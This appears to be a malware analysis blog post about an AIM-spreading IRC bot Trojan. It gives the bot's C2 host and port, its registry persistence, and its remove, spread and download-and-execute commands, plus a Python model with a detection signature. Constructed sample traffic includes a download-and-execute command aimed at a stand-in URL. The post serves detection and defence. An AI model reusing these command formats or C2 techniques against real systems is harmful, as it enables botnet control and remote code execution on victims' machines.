
Malware Analysis - Niteaim

It seems that in the last 24 hours a new Trojan horse that spreads itself through AIM has been making its rounds. The file, which is included in disabled form in the archive linked at the end of this post, is called niteaim.exe. Google has not heard of it so far. I've performed a thorough analysis of it.

The file is packed with a very simple PE packer that contains no anti-analysis features such as anti-debugging or anti-disassembly tricks. It is not polymorphic either; the unpacking stub is plain, unobfuscated code and can be found between the offsets 0x400158 and 0x4001FA. The packed payload sits at offset 0x406000 and is unpacked to 0x401000.
Once unpacking is done and the necessary imports have been resolved, execution continues in the unpacked code at offset 0x402076, which is the standard runtime initialization code of a program written in VC++. The actual code of the Trojan horse begins at 0x40103F.

The main function creates a named mutex called ANITE to make sure only one instance of the Trojan horse is active at a time. It then copies itself (niteaim.exe) to the Windows directory and creates a registry value named WinNite under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that it is started automatically.

Afterwards the Trojan horse attempts to connect to the internet, specifically to an IRC server at anite.m1rr0r.net (port 8080). It registers with the server by sending "USER %s %s %s :%s\r\nNICK %s\r\n", where every %s is the same random string of the form "NXXXXXXXXXX" with each X a random digit. Once connected, the Trojan horse joins the IRC channel #aim with the password knight (although no password is actually set on the channel) and waits there for further instructions from the owner of the IRC server (the main IRC function starts at 0x4014F4). Curiously enough, the Trojan horse checks that the host of the client it interacts with is not of the form *FBI.GOV*.

The Trojan horse recognizes three commands, which are sent to it via private messages on the IRC server.
The first command is ":r", which executes the function at 0x4019B8 (it removes the auto-start registry value) and afterwards terminates the Trojan horse.
The second command is ":a", which tells the Trojan horse to search for an active AIM session and, if one exists, to spread itself through it by sending instant messages to the users on the contact list. For this purpose a new thread is started with the thread function at 0x401F46.
The third command is ":d", which serves as a backdoor into the user's PC. It takes two parameters, a URL and a local filename. The Trojan horse tries to download the file at the given URL to the given local path and, if the download succeeds, executes it. This command also runs in its own thread, with the thread function at 0x401A23.
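To make the check-in and command handling described above concrete, here is a small Python model of the bot's IRC side, written for this page as an added example; it is not code from the sample or from the IDB in the archive. The registration format, the nick pattern, the channel, the three command names and the *FBI.GOV* check come from the analysis above. The single-space separator between the ":d" parameters, the case-insensitive match on "FBI.GOV", and all sample traffic are assumptions constructed for the example. The registration regex doubles as a network detection signature: the USER fields and the NICK are all the same N-plus-ten-digits token, which ordinary IRC clients never produce.

```python
import random
import re

# Facts taken from the analysis above.
C2_HOST = "anite.m1rr0r.net"
C2_PORT = 8080
CHANNEL = "#aim"
CHANNEL_KEY = "knight"


def random_nick(rng=random):
    """Nick of the form N followed by ten random digits, as the bot generates it."""
    return "N" + "".join(rng.choice("0123456789") for _ in range(10))


def registration(nick):
    """First bytes the bot sends after connecting:
    'USER %s %s %s :%s\\r\\nNICK %s\\r\\n' with every %s the same nick."""
    return "USER %s %s %s :%s\r\nNICK %s\r\n" % (nick, nick, nick, nick, nick)


# Detection: all five fields are one identical N+10-digit token, so a
# backreference regex matches the bot's registration and nothing else.
REG_RE = re.compile(r"^USER (N\d{10}) \1 \1 :\1\r\nNICK \1\r\n")


def is_niteaim_registration(payload):
    """True if the first bytes of a TCP stream look like the bot's check-in."""
    return REG_RE.match(payload) is not None


def host_allowed(host):
    """The bot refuses to talk to peers whose host matches *FBI.GOV*.
    Case-insensitive matching is an assumption; the write-up does not say."""
    return "FBI.GOV" not in host.upper()


def parse_command(body):
    """Map a private-message body to one of the three bot commands.
    Returns (action, args) or None for anything the bot ignores.
    Assumption: ':d' parameters are separated by single spaces."""
    parts = body.strip().split(" ")
    cmd = parts[0]
    if cmd == ":r":
        return ("remove_autostart_and_exit", ())
    if cmd == ":a":
        return ("spread_via_aim", ())
    if cmd == ":d" and len(parts) == 3:
        url, local_file = parts[1], parts[2]
        return ("download_and_execute", (url, local_file))
    return None


PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!]+)!(?P<user>[^@]+)@(?P<host>\S+) PRIVMSG (?P<target>\S+) :(?P<body>.*)$"
)


def handle_privmsg(line):
    """Parse a raw IRC line ':nick!user@host PRIVMSG target :body' and
    dispatch it the way the bot would; returns the action it would take."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    if not host_allowed(m.group("host")):
        return ("ignored_fbi_host", ())
    return parse_command(m.group("body"))


# Constructed sample traffic for the example; not captured from the botnet.
SAMPLE_LINES = [
    ":op!op@example.net PRIVMSG N0123456789 ::a",
    ":op!op@example.net PRIVMSG N0123456789 ::d http://example.invalid/x.exe c:\\x.exe",
    ":agent!a@host.fbi.gov PRIVMSG N0123456789 ::r",
    ":op!op@example.net PRIVMSG N0123456789 ::r",
]

if __name__ == "__main__":
    nick = random_nick(random.Random(1))
    print(repr(registration(nick)), is_niteaim_registration(registration(nick)))
    for raw in SAMPLE_LINES:
        print(raw, "->", handle_privmsg(raw))
```

Pointing `is_niteaim_registration` at the first bytes of any outbound connection to port 8080 is enough to flag an infected host on the wire, independent of the C2 hostname, which the update below shows can move.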

I guess circulation of this Trojan horse started within the last 24 hours. When I first joined the IRC channel a few hours ago, only a little more than 30 infected clients were in there. I'm still idling there hoping to receive some commands from the server owner (no success so far), and the number of clients has exceeded 400 now and is growing rapidly.

Click here for an archive that includes the following files:
- The Trojan horse binary (in disabled form)
- The IDA 4.8 IDB file I used to analyze the Trojan horse
- An annotated disassembly in HTML format

Edit: Update - The number of infected clients on that IRC network grew to over 25,000 while I was asleep. Two download commands were sent to the clients and then the server shut down a while afterwards. It's likely that the botnet moved elsewhere.
